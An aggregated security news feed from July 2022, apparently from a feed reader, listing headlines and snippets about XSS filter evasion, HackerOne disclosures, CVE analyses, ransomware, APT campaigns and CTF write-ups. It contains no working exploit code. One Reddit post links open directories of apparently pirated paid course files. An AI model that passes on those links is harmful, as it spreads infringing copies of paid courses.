    Property-based payloads are payloads based on some particular properties of the document object and the elements. From the document object we already know the location-based payloads and from the elements we have the properties  “innerHTML” and “outerHTML”. Those 3 are very useful to evade a filter or WAF when we get to the point where … Continue reading Tag Blending Obfuscation In Property-Based Payloads The post Tag Blending Obfuscation In Property-Based Payloads appeared first on Brute XSS.
  • Open

    Burp Suite roadmap update: July 2022
    With six (and a bit) months of 2022 already gone, it's time to bring you an update on the latest happenings down at Burp Towers. Find out what we've been up to, and where we're going between now and 2
  • Open

    Burp Suite roadmap update: July 2022
    With six (and a bit) months of 2022 already gone, it's time to bring you an update on the latest happenings down at Burp Towers. Find out what we've been up to, and where we're going between now and 2
  • Open

    Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
    The 2022 Unit 42 Network Threat Trends Research Report includes an analysis of the CVEs most commonly exploited in 2021 and predictions for which CVEs attackers will likely focus on in the year to come. The post Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report appeared first on Unit 42.
  • Open

    Valve stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    lots and lots of old flash games
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    HTB-Business CTF
    No content preview
  • Open

    HTB-Business CTF
    No content preview
  • Open

    HTB-Business CTF
    No content preview
  • Open

    云沙箱流量识别技术剖析
    作者:风起 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 大家好,我是风起,本次带来的是基于流量的沙箱识别技术。相信大家都知道,沙箱识别是老生常谈的话题了,目前大部分的识别方案都是基于样本侧去完成的,例如常规方式:硬件检查(CPU核心数、输入输出设备、内存)、鼠标移动检查、进程名、系统服务、开机时长等,都不能...
  • Open

    云沙箱流量识别技术剖析
    作者:风起 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 大家好,我是风起,本次带来的是基于流量的沙箱识别技术。相信大家都知道,沙箱识别是老生常谈的话题了,目前大部分的识别方案都是基于样本侧去完成的,例如常规方式:硬件检查(CPU核心数、输入输出设备、内存)、鼠标移动检查、进程名、系统服务、开机时长等,都不能...

  • Open

    DOM XSS on ads.tiktok.com
    TikTok disclosed a bug submitted by 0x7: https://hackerone.com/reports/1549451 - Bounty: $2500
    Internal Employee informations Disclosure via TikTok Athena api
    TikTok disclosed a bug submitted by hein_thant: https://hackerone.com/reports/1575560 - Bounty: $1000
    Can access the job name, creator name and can report any draft/under review/rejected job
    LinkedIn disclosed a bug submitted by sachin_kumar_: https://hackerone.com/reports/1581528 - Bounty: $1000
    LFI via Jolokia at https://...:1293
    8x8 disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1641661
  • Open

    TryHackMe | OhSINT Writeup
    TryHackMe’s OhSINT room writeup, from a single photo to finding a person’s password. Continue reading on Medium »
    MDI Nerede? — Raw Security Sohbetleri 0x04 (OSINT)
    Bu yazıda Raw Security Sohbetleri’nin 4. bölümünde Mehmet Abi’nin konumunu OSINT ile nasıl bulduğumuzu anlatmaya çalışacağım. Continue reading on Medium »
    War in Ukraine / July 19
    Day 147: Ukraine promotes the Kherson direction Continue reading on Medium »
  • Open

    Variable PATH
    Explotación de la variable PATH para ganar acceso al sistema obteniendo una shell con maximos privilegios. Continue reading on Medium »
    Windows Desktop (Thick) Client Pentesting — DLL Hijacking
    Welcome white hats! Have you ever done thick client pentesting? Have you ever found DLL hijacking in real engagement? I know that it is… Continue reading on Medium »
  • Open

    ZeroTrust Certifications?
    Any zerotrust related security certifications? Thanks in advance. submitted by /u/DisturbedBeaker [link] [comments]
    Good mid-level Incident Response training?
    Good morning, The vast majority of all alerts generated that I have experience with are simple auto-remediated stuff through Microsoft Defender for Endpoint or just easy Q&A type of stuff (like, large volume of data being deleted...look who it is and what it is, ask a question, resolve the alert, etc). I have realized that "true" IR is an area I feel very unprepared for, so my question to the Reddit community is, what are your recommendations on some beneficial mid-level IR training? By mid-level I mean that I won't be doing incredibly detailed stuff like forensics, but I do want to learn a bit of hands-on procedures/methodology and not have it all just be higher level theory/design. Thanks! submitted by /u/ToLayer7AndBeyond [link] [comments]
  • Open

    【安全通报】Weblogic 七月份更新多个高危漏洞
    近日,Oracle官方 发布了 2022 年 7 月份的安全更新。涉及旗下产品(Weblogic Server、Databa se Server、Java SE、MySQL等)的 349 个漏洞。此次修复的漏洞中包...
  • Open

    【安全通报】Weblogic 七月份更新多个高危漏洞
    近日,Oracle官方 发布了 2022 年 7 月份的安全更新。涉及旗下产品(Weblogic Server、Databa se Server、Java SE、MySQL等)的 349 个漏洞。此次修复的漏洞中包...
  • Open

    Multiple Vulnerabilities in Atlassian Products
    submitted by /u/sullivanmatt [link] [comments]
    [CVE-2022-34918] A crack in the Linux firewall
    submitted by /u/gquere [link] [comments]
    DNS-over-HTTP/3 in Android
    submitted by /u/SeanPesce [link] [comments]
    Cloud is more fun with an SSRF
    submitted by /u/Ancient_Title_1860 [link] [comments]
    Session On Android – An App Wrapped in Signal
    submitted by /u/jeandrew [link] [comments]
  • Open

    From Stack Trace Laravel Leads to Privilege Escalation [Admin]
    Hi!, In this Article I will only tell a little about the findings that I think are interesting to be used as stories on my medium.com xD Continue reading on Medium »
    Server Side Request Forgery (SSRF) Attacks & Cara Mencegahnya / Patched #Episode_SSRF1
    Serangan Server-Side Request Forgery (SSRF) memungkinkan penyerang membuat permintaan ke domain apa pun melalui server yang rentan… Continue reading on Medium »
    Initial Setup Genymotion & Burpsuite for Android Mobile App Pentest(Bahasa)
    Pada kesempatan kali ini, saya menulis artikel mengenai instalasi genymotion dan burpsuite yang akan digunakan untuk melakukan penetrasi… Continue reading on Medium »
    Instalasi Genymotion dan pemasangan Burpsuite certificate pada emulator Genymotion
    Halo teman-teman, selamat datang di post medium pertama saya. Pada post ini saya akan membagikan tutorial bagaimana cara instalasi… Continue reading on Medium »
    Genymotion Device Installation and Burpsuite Certificate Installation in Genymotion Emulator…
    First, open Genymotion App Continue reading on Medium »
    Maximizing the potential of the “Subfinder”
    Hi guys, in this post I will be sharing about how to maximize the potential of subfinder. So, what is subfinder? and how to use it… Continue reading on Medium »
  • Open

    SecWiki News 2022-07-20 Review
    关于安全情报能力和应用的一些思考 by ourren 对全网上一些JSONP蜜罐探索与识别 by ourren 一次曲折的代码审计+渗透+绕过WAF+提权实战 by ourren Web3发展前瞻研究报告 by ourren 样本相似分析新尝试:通过音频实现 by Avenger 《物联网终端安全入门与实践之了解物联网终端》下 by ourren 物联网终端安全入门与实践之玩转物联网固件(中) by ourren 《物联网终端安全入门与实践之玩转物联网固件》上 by ourren 物联网终端安全入门与实践之了解物联网终端 (上篇) by ourren 关于X信数据库的解密以及取证 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-20 Review
    关于安全情报能力和应用的一些思考 by ourren 对全网上一些JSONP蜜罐探索与识别 by ourren 一次曲折的代码审计+渗透+绕过WAF+提权实战 by ourren Web3发展前瞻研究报告 by ourren 样本相似分析新尝试:通过音频实现 by Avenger 《物联网终端安全入门与实践之了解物联网终端》下 by ourren 物联网终端安全入门与实践之玩转物联网固件(中) by ourren 《物联网终端安全入门与实践之玩转物联网固件》上 by ourren 物联网终端安全入门与实践之了解物联网终端 (上篇) by ourren 关于X信数据库的解密以及取证 by ourren 更多最新文章,请访问SecWiki
  • Open

    More to find in a previous post.
    http://s28.bitdl.ir/>> Follow your nose and see what you find... http://s28.bitdl.ir/Video/Good stuff in here. http://s28.bitdl.ir/Compresed/More good stuff in here... http://s28.bitdl.ir/Compresed/Lynda/ http://s28.bitdl.ir/Compresed/OREILLY/ http://s28.bitdl.ir/Compresed/Udemy/ submitted by /u/klutz50 [link] [comments]
    geometry, topology and comp-sci papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    How about finding open directories that are nofollow?
    Any good methods on this finding nofollow open directories? submitted by /u/G-Streams [link] [comments]
  • Open

    FreeBuf早报 | 阿尔巴尼亚政府遭受“大规模网络攻击”;BlackBerry 2022威胁报告
    欧盟理事会 (EU)向外界警告称威胁行为者在俄罗斯和乌克兰之间持续冲突的背景下进行的恶意网络活动。
    「斗象攻防演练宝典」之妙手部署“云蜜罐”
    一文看清蜜罐部署的本手、妙手与俗手
    过去10年的10起“分水岭”网络安全事件
    网络安全供应商Trustwave列出了过去10年中,最突出和最值得注意的10个网络安全问题和违规事件。
    知名GPS出现漏洞,可使黑客获得管理权限
    漏洞研究人员发现了有关于GPS追踪器MiCODUS MV720的安全问题,该追踪器广泛应用在世界50强企业、欧洲政府、美国各州、南美军事机构和核电站运营商等,共计169个国家约150万车辆中。MiCODUS MV720用户地图(BitSight)此次发现MV720设备存在共有6个漏洞,侵入该设备的黑客可以利用它来追踪甚至定位使用该设备的车辆,也可以通过该设备收集有关路线的信息,并操纵数据。考虑到该
    频繁升级,勒索新变种不断涌现
    在过去的几周里,FortiGuard Labs 观察到了几个新的勒索软件变体。
    新型恶意软件CloudMensis 正对 Mac 设备部署后门
    该恶意软件支持数十种命令,包括屏幕截图、窃取文档、记录键盘信息等。
    黑客组织“8220”将云僵尸网络发展到超过 30,000 台主机
    近期,一个名为8220组织的加密采矿团伙利用Linux和云应用程序漏洞将其僵尸网络扩大至30,000多台受感染的主机。该组织的技术并不高,但经济动机强,他们针对运行Docker、Redis、Confluence和Apache漏洞版本的公开系统,感染AWS、Azure、GCP、Alitun和QCloud等主机。该团伙以前的攻击依赖于公开可用的漏洞利用来破坏 Confluence 服务器。在获得访问权
    被滥用的Slack服务:APT29针对意大利的攻击活动分析
    APT29组织的攻击活动可追溯至2008年,主要攻击目标包括西方政府组织机构、智囊团。
  • Open

    SANS / GIAC examinations
    Hi there. I’m going to be taking the GCFE exam in a few months which covers SANS FOR500 material. I have not taken the FOR500 course but do have copies of the materials/books. Does anyone know if I will be able to bring these into the exam even though I have not taken the FOR500 course, as it will affect my indexing if not. Thanks. submitted by /u/Individual_Tax_5842 [link] [comments]
  • Open

    File Permissions in Linux
    No content preview
    TryHackMe — Offensive Security
    No content preview
    Paper from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    File Permissions in Linux
    No content preview
    TryHackMe — Offensive Security
    No content preview
    Paper from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    File Permissions in Linux
    No content preview
    TryHackMe — Offensive Security
    No content preview
    Paper from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    CVE-2020-8558-跨主机访问127.0.0.1
    作者:leveryd 原文链接:https://mp.weixin.qq.com/s/hvb_Kr6DqAPPfnN-lbx1aA 背景 假设机器A和机器B在同一个局域网,机器A使用nc -l 127.0.0.1 8888,在机器B上可以访问机器A上"仅绑定在127.0.0.1的服务"吗? [root@instance-h9w7mlyv ~]# nc -l 127.0.0.1 8888 &a...
    Linux 内核 nftables 子系统研究与漏洞分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/ILyBUq--PK01TvNF8Vh9KQ 1 背景 近期,开源安全社区oss-security披露了多个Linux内核netfilter模块相关漏洞,漏洞均出现在netfilter子系统nftables中,其中两个漏洞在内核中存在多年,并且均可用于内核权限提升。漏洞编号分别为:CVE-2022-32...
  • Open

    CVE-2020-8558-跨主机访问127.0.0.1
    作者:leveryd 原文链接:https://mp.weixin.qq.com/s/hvb_Kr6DqAPPfnN-lbx1aA 背景 假设机器A和机器B在同一个局域网,机器A使用nc -l 127.0.0.1 8888,在机器B上可以访问机器A上"仅绑定在127.0.0.1的服务"吗? [root@instance-h9w7mlyv ~]# nc -l 127.0.0.1 8888 &a...
    Linux 内核 nftables 子系统研究与漏洞分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/ILyBUq--PK01TvNF8Vh9KQ 1 背景 近期,开源安全社区oss-security披露了多个Linux内核netfilter模块相关漏洞,漏洞均出现在netfilter子系统nftables中,其中两个漏洞在内核中存在多年,并且均可用于内核权限提升。漏洞编号分别为:CVE-2022-32...
  • Open

    Browser API Fuzzing with Dynamic Mod-Ref Analysis [pdf]
    Article URL: https://nebelwelt.net/files/22FSE.pdf Comments URL: https://news.ycombinator.com/item?id=32161267 Points: 1 # Comments: 0

  • Open

    NiCOFF: COFF and BOF Loader written in Nim
    submitted by /u/DarkGrejuva [link] [comments]
    WINDOWS PASSWORD MINING
    submitted by /u/Clement_Tino [link] [comments]
    Master Student In Need Of Red Teamers
    Hello everyone! My name is Andrei and I am a master's student at the Technical University of Eindhoven (The Netherlands). I'm studying Information Security Technology, which is just fancy wording for cybersecurity. Currently, I am working on my master thesis, titled "Analysis of WMI-based Attacks in Microsoft Windows Environments" (the title is a work in progress). The main research idea is to look into what are the differences in how WMI is used by sysadmins vs how it is being misused by threat actors. Then, by identifying these differences, I can choose criteria that can be used for detection systems to lower the number of false positives specifically for WMI. And here comes my question. For my methodology, I need to hold a number of interviews with professionals from the sysadmin pool and from the pentester/red team pool. I am looking in this sub for red teamers who have work experience abusing WMI, who have a max of 45 minutes of free time, and have an open mind to have an informal and fun conversation with a student. The interview is a mix of open questions and filling in an Excel sheet. The sheet contains PowerShell and WMIC commands split into three categories: Enumeration, Code Execution, and Persistence. I am interested if you ever used those commands, in what context, and a concrete example. My list is also open for additions, probably I did not cover every command which can be used. I won't ask for too much personal information, only the name, position, and company you work/worked at. I would like to have a diverse pool of professionals (different companies etc,). I will also send the questions and sheet in advance so you have an idea of how to answer some of them. Thank you for reading and I hope some of you would be interested in helping me or at least forwarding my request to people that would want to help me! And even if you can't help, a like or comment would help bump the post so it can get more attention. submitted by /u/MidWarz [link] [comments]
  • Open

    Caçando classes de vulnerabilidades desconhecidas
    — Based: BlackHatBCS tradc— Continue reading on Medium »
    My Essential Recon Commands
    Resolution Continue reading on Medium »
    Step-wise Checklist for Web Penetration and Bug Hunters
    This checklist may help you to have a suitable methodology for bug bounty hunting. When you have done an action, don’t forget to check ;)… Continue reading on Medium »
    JSON web tokens (JWT) attacks
    What are JWTs? Continue reading on Medium »
    How i was able to bypass Open Redirect 3 times on same program.
    Hello Security folks, Here is interesting finding which I want to share. As you know i only write if it’s unique finding or if my approach… Continue reading on Medium »
  • Open

    War in Ukraine / July 18
    Day 146: Russia can force Ukraine to prolong the war Continue reading on Medium »
    OSINT Cheatsheet (sites,tools)
    Overview Continue reading on Medium »
    How to hire a threat intelligence analyst
    Alongside growing division across the world is a severely unstable, and therefore unpredictable, global economy. Ongoing conflicts, a… Continue reading on Medium »
    CyberSoc CTF — General Knowledge
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    imaginaryCTF: Unpuzzled4
    The Challenge Continue reading on Medium »
    imaginaryCTF: Journey
    The Challenge Continue reading on Medium »
  • Open

    Writeup for Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
    submitted by /u/xnyhps [link] [comments]
    Microsoft Azure Arc Logging Passwords in Plaintext
    submitted by /u/dinobyt3s [link] [comments]
    The Workings of Whatsapp's Backups (and why you should enable End-to-End Encrypted Backups)
    submitted by /u/IceCereal [link] [comments]
    chip-red-pill/MicrocodeDecryptor - understand how Intel mitigated spectre vulnerability, explore the implementation of Intel TXT, SGX,VT-x technologies
    submitted by /u/Gallus [link] [comments]
    EJS, Server side template injection RCE (CVE-2022-29078)
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-07-19 Review
    websocket新型内存马的应急响应 by ourren 从知网被查看网络安全审查 by ourren 如何从 0 到 1 打造国防领域的产品 by ourren 2022 软件供应链安全技术白皮书 by ourren 我认为网络安全工具的未来:开篇 by ourren linux权限维持 by ourren 反-反蜜罐:以三个反蜜罐插件的缺陷为例 by ourren 基于追踪标记的WAF设计思路 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-19 Review
    websocket新型内存马的应急响应 by ourren 从知网被查看网络安全审查 by ourren 如何从 0 到 1 打造国防领域的产品 by ourren 2022 软件供应链安全技术白皮书 by ourren 我认为网络安全工具的未来:开篇 by ourren linux权限维持 by ourren 反-反蜜罐:以三个反蜜罐插件的缺陷为例 by ourren 基于追踪标记的WAF设计思路 by ourren 更多最新文章,请访问SecWiki
  • Open

    Announcing Rust 1.62.1 (Vulnerability Fixed)
    Article URL: https://blog.rust-lang.org/2022/07/19/Rust-1.62.1.html Comments URL: https://news.ycombinator.com/item?id=32152495 Points: 2 # Comments: 0
    Multiple vulnerability leading to account takeover in TikTok SMB subdomain
    Article URL: https://hackerone.com/reports/1404612 Comments URL: https://news.ycombinator.com/item?id=32147645 Points: 2 # Comments: 0
  • Open

    AWS EC2 Auto Scaling Privilege Escalation
    Introduction Continue reading on Medium »
  • Open

    Fully Exploiting Data Sources
    Very often, we view data sources as somewhat one dimensional, and don't think about how we can really get value from that data source. We're usually working on a case, just that investigation that's in front of us, and we're so "heads down" that we may not consider that what we see as a single data source, or an entry from that data source (artifact, indicator), is really much more useful, more valuable, than how we're used to viewing it. So, what am I talking about? Let's consider some of the common data sources we access during investigations, and how they're accessed. Consider something that we're looking at during an investigation...say, a data source that we often say (albeit incorrectly) indicates program execution the "AppCompatCache", or "ShimCache". Let's say that we parse the App…
  • Open

    Extracting data from start and end addresses in memory.
    Hello all! I’ve hit a wall with volatility and am looking for advice on what I should do next. So far I have used the unloadedmodules plugin in volatility and have noticed some unloaded .sys files I want to carve out and analyze further. The plug-in displays the start and end address of the file in memory, but how do I use this information in volatility to carve out that section in memory? Any help would be greatly appreciated and thank you! submitted by /u/shikata_ganai [link] [comments]
  • Open

    How to deal with phishing incidents?
    One of my colleagues clicked on a malicious link and logged in with her business email credentials [business Gmail account]. When she found that the email is used for phishing, she changed her password and scanned the laptop. Fortunately, there was no malware downloaded. Are there any steps she should do besides what I already mentioned? submitted by /u/OmegaMan-PT [link] [comments]
    Mimikatz good starting point
    hi, I used mimikatz sometimes (mostly CTFs), but I would like to better understand his concepts. Can someone recommend me a valid starting point (url, youtube video, ..)? thankyou submitted by /u/g-simon [link] [comments]
    Why are those collab tools such as Trello, Jira, Nortion neglected opened without any authentication procedure?
    Perhaps the collab tools are one of the most important servers that must be managed appropriately. But there are so many exposed, opened colla tools without any authentication process. https://blog.criminalip.io/2022/07/01/collaboration-tool-vulnerability/ Default configuration should be more secure, but less. I'd say not even 10% of people using Jira or colla tools understand how authentication works between components. Always people think they're safe, it's not their turn. But this is fundamental reason why the critical datsets of enterprises are sold in dark web or forum. submitted by /u/scopedsecurity101 [link] [comments]
  • Open

    FreeBuf早报 | 苹果App Store存在大量欺诈应用;FBI将全面升级网络基础设施
    FBI对规划架构提出了大量具体的安全要求,如零信任、SASE、强隔离、可见性等。
    针对WordPress插件漏洞的攻击数量激增
    来自Wordfence的研究人员对近期高频率出现的针对WordPress Page Builder插件的网络攻击发出警告。
    利用恶意软件和钓鱼攻击,Roaming Mantis针对Android和iOS用户发起攻击
    在袭击德国、台湾、韩国、日本、美国和英国之后,Roaming Mantis将转向法国。
  • Open

    Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive
    Cloaked Ursa (aka APT29) has recently used trusted online storage services to deliver Cobalt Strike. The post Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive appeared first on Unit 42.
  • Open

    HTML Injection in E-mail Not Resolved ()
    Acronis disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1600720
  • Open

    简单理解 V8 Turbofan
    作者:TokameinE@知道创宇404实验室 日期:2022年7月19日 “JavaScript 代码本身就是一个二进制程序。” 不知道读者是否在什么地方听说过这样的解释,但笔者认为这个形容相当生动。因为 JavaScript 的代码是懒惰解释的,只有在特定函数被执行时候,解释器才会对这部分代码进行解释,生成对应的字节码。但这些字节码会随着代码的运行而产生变动,同一份代码有可能在同一次执行...
    Pocsuite3 Tutorial for beginners
    Author: Knownsec 404 Team Chinese version: https://paper.seebug.org/1931/ 1 Introduction Pocsuite3 is a remote vulnerability testing framework based on GPLv2 license and open source created by Kno...
  • Open

    简单理解 V8 Turbofan
    作者:TokameinE@知道创宇404实验室 日期:2022年7月19日 “JavaScript 代码本身就是一个二进制程序。” 不知道读者是否在什么地方听说过这样的解释,但笔者认为这个形容相当生动。因为 JavaScript 的代码是懒惰解释的,只有在特定函数被执行时候,解释器才会对这部分代码进行解释,生成对应的字节码。但这些字节码会随着代码的运行而产生变动,同一份代码有可能在同一次执行...
    Pocsuite3 Tutorial for beginners
    Author: Knownsec 404 Team Chinese version: https://paper.seebug.org/1931/ 1 Introduction Pocsuite3 is a remote vulnerability testing framework based on GPLv2 license and open source created by Kno...
  • Open

    Good things takes time | Story of my first “valid” critical bug!
    No content preview
    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    No content preview
  • Open

    Good things takes time | Story of my first “valid” critical bug!
    No content preview
    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    No content preview
  • Open

    Good things takes time | Story of my first “valid” critical bug!
    No content preview
    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    No content preview
  • Open

    Bunch of classical and Church music
    https://dataup.sdasofia.org/MUSIC/ submitted by /u/chloroformica [link] [comments]
    How to search better than the OD search sites?
    I use all of the open directory search sites, and I do find what Im looking for but is there another method. For example like using google dorks to find files, or some kind of python script etc? submitted by /u/G-Streams [link] [comments]
  • Open

    Which browser is the best to start with? Chrome, Edge, Firefox etc
    I’ve spent the last few months going through the different classes of memory corruption vulns + writing exploits for different CVE’s and want to start diving into VR. Which browser is the most noob friendly? Should I even be targeting browsers at this point in my learning? submitted by /u/Amullatoavibrato [link] [comments]

  • Open

    PDFs of literature in the public domain
    submitted by /u/Nerditter [link] [comments]
    3d modelling stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Question
    Is there a directory of 3d models from sketchfab or anything? (specifically paid ones) Or is there a current reddit post that haves a directory of of 3d models? Or subreddit? Hopefully I'm not breaking the 2nd rule. submitted by /u/Particular_Bed2427 [link] [comments]
  • Open

    Unit 42 Threat Group Naming Update
    Threat group naming helps track and identify attackers' activities. Unit 42 is looking to the stars for an updated approach. The post Unit 42 Threat Group Naming Update appeared first on Unit 42.
  • Open

    new privesc on AWS (DataScientist policy)
    submitted by /u/stk_ [link] [comments]
    /r/netsec's Q3 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]
    unRAR CVE-2022-30333 deep dive (including full exploit for Zimbra)
    submitted by /u/iagox86 [link] [comments]
    Disrupting Kill Chains with Just-in-Time Access Environments
    submitted by /u/mesok8 [link] [comments]
    Building a process to evaluate security tools
    submitted by /u/LivingInSyn [link] [comments]
    A Deep Dive Into ALPHV/BlackCat Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Research: Auditing WordPress Plugins (35 CVEs in 3 months)
    submitted by /u/andersonmvd [link] [comments]
  • Open

    How can I block Venntel / Gravy Analytics?
    Venntel and Gravy Analytics use app integration to harvest and sell location data. How can I block this data leak using a firewall rule? Is there a way to know if an app installed on my iPhone or Android report to Venntel or Gravy Analytics? The bulk of the location data ... came from its contract with Venntel, a location data broker based in Virginia. Venntel is a subsidiary of Gravy Analytics, an advertising company that specializes in location data. Gravy Analytics is the leading provider of real-world location intelligence for marketers. ... verifies consumer attendances at millions of places, points-of-interest, and local events, providing unprecedented visibility into the offline consumer journey. Gravy Analytics processes billions of pseudonymous, mobile location signals every day from millions of mobile devices to understand where people go and why. The analytics application platform turns location data into intelligence.... Venntel draws its data from mobile applications such as weather trackers and mobile games, which require location access to play. The company that originally collected that information then sells the data.... submitted by /u/Janice_2022 [link] [comments]
    how to clean up a wordlist?
    I have used crunch to generate 8 digits wordlist. and I would like to remove any result that has a single number repeated sequentially more than 4 times. for example I want to keep these: 0034001 2227422 but remove these: 0000341 2222274 what is the best way to do that? for now, I'm thinking of making another wordlist containing these results and subtracting them from the main wordlist using: comm -2 redundant.txt main.txt > cleaned.txt. but I was wondering if there is a better way. thanks submitted by /u/gamer121323 [link] [comments]
    Does anyone know any free database for URL categorisation?
    As per title - I am aware that these might not be curated, complete or 100% reliable - I was wondering if anyone knows any open source database/collection for URL categorisation. The use case is: given a URL, determine if it points to a) malicious website/IP b) adult content c) religious - just to name a few examples. I am aware that there are resources for a specific use case (malicious IP, websites) and/or there are paid options that address this. submitted by /u/OneEyedMerchant [link] [comments]
    How much karma is needed to post to r/netsec? how old does the account have to be?
    I tried to post content with a fresh account, but the post just get auto-flagged as spam. When trying to reach out to the mods the account was either suspended or the mods are rejecting direct messages. Quit at a loss here? Is there a guideline on how much karma an account needs or how old an account to be to post to r/netsec? TIA. submitted by /u/haxflilet [link] [comments]
  • Open

    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    … Continue reading on InfoSec Write-ups »
    Busy Sunday Because Of Privilege escalation
    How i was able to takeover whole website and get access to account all users, get access to sensitive data of all users , i was able to… Continue reading on Medium »
    MSA Weekly 4 — “How to Get Subdomain’s Using Subfinder & Sudomy”
    Indonesia Continue reading on Medium »
    Hey Google Lets submit bug from Victim Account !
    IntroductionThis is the story of how my bug bounty journey helped me to pay for my college fees. Continue reading on Medium »
    MSA Weekly 4 — “How to Get Subdomain’s Using Subfinder & Sudomy”
    Subdomain enumeration merupakan proses untuk menemukan subdomain dan membantu mengungkapkan domain/sub-domain yang kemungkinan muncul bug… Continue reading on Medium »
    Good things takes time | Story of my first “valid” critical bug!
    Hello there, I am Krishna Agarwal ( Kr1shna 4garwal ) from India 🇮🇳. An ordinary bug hunter and So called security researcher :) Continue reading on Medium »
    Bug Bounty Program
    Resolve bugs … Continue reading on Medium »
    Bug Bounty: Blind XSS Payloads Explained
    This article was originally posted on bepractical.tech Continue reading on Medium »
    MSA Weekly 4 — [How to Get Subdomain’s Using Subfinder & Sudomy]
    Subdomain’s Enumeration Continue reading on Medium »
  • Open

    CVE-2022–35909 / CVE-2022–35910, Incorrect Access Control and XSS Stored to Jellyfin
    This vulnerability on version 10.7.7,(fixed in 10.8.0) Continue reading on stolabs »
  • Open

    War in Ukraine / July 15–17
    Day 145: Russia’s losses are at least 50,000 soldiers Continue reading on Medium »
  • Open

    SecWiki News 2022-07-18 Review
    SecWiki周刊(第437期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-18 Review
    SecWiki周刊(第437期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Without verifying email and activate account, user can perform all action which are not supposed to be done
    Stripe disclosed a bug submitted by tabaahi: https://hackerone.com/reports/1272305 - Bounty: $100
    subdomain takeover at odoo-staging.exness.io
    EXNESS disclosed a bug submitted by omer: https://hackerone.com/reports/1540252 - Bounty: $100
    unauth mosquitto ( client emails, ips, license keys exposure )
    Acronis disclosed a bug submitted by second_grade_pentester: https://hackerone.com/reports/1578574 - Bounty: $150
    Cross-site scripting (DOM-based)
    OneWeb disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1512644
    CVE-2019-11248 on http://...:9100/debug/pprof/goroutine
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1607940
    Public Apache Tomcat /examples example directory
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1622624
  • Open

    工控系统谨防PLC和HMI的密码破解软件
    此次攻击活动利用密码破解器软件获取可编程逻辑控制设备(PLC)的权限,并让其成为“肉鸡”,加入僵尸网络。
    FreeBuf早报 | 阿尔巴尼亚政府网站因网络攻击关闭;Tor浏览器可自动绕过互联网审查
    阿尔巴尼亚国家信息社会局表示,由于遭到境外黑客攻击,阿尔巴尼亚政府网站、在线公共服务机构网站暂时关闭。
    赠书福利 | 还不够了解零信任?《白话零信任》一书送给你
    随着云计算和移动办公时代的到来,传统安全模式已经渐渐失效,“零信任”成为当下最受认可的安全架构。
    Digium软件存在漏洞,威胁行为者利用其攻击VoIP服务器
    Unit 42的研究人员发现了一项针对2021年12月以来Digium手机中使用的Elastix系统的活动。
    研究发现,攻击者利用伪造时间戳等方式在GitHub上传播恶意代码
    安全供应商警告说,开发人员需要谨慎对待 GitHub 上的开源项目,其中可能暗藏恶意代码。
    Premint NFT遭史上最大NFT黑客攻击
    知名NFT平台Premint NFT遭到入侵,攻击者盗取了314个NFTs。
    Tor 浏览器迎重大更新,可自动绕过互联网审查
    Tor 项目团队宣布发布 Tor 浏览器 11.5版本,而此次更新就只有一个目的——帮助用户自动绕过互联网审查。
    菲律宾数据合规重点解读
    菲律宾关于数据合规的执法行为严格且全面,且较之他国菲律宾的数据保护法律体系更为庞杂。
  • Open

    websocket 新型内存马的应急响应
    作者:flamingo 原文链接:https://mp.weixin.qq.com/s/T3UfA1plrlG-e9lgfB4whg 前几天看到一个推送,websocket新型内存马。因其自身注册在Ws下面所以常规的内存检测脚本memshell scanner无法快速检出来。 项目地址:https://github.com/veo/wsMemShell 为了防止应急响应的时候翻车...
  • Open

    websocket 新型内存马的应急响应
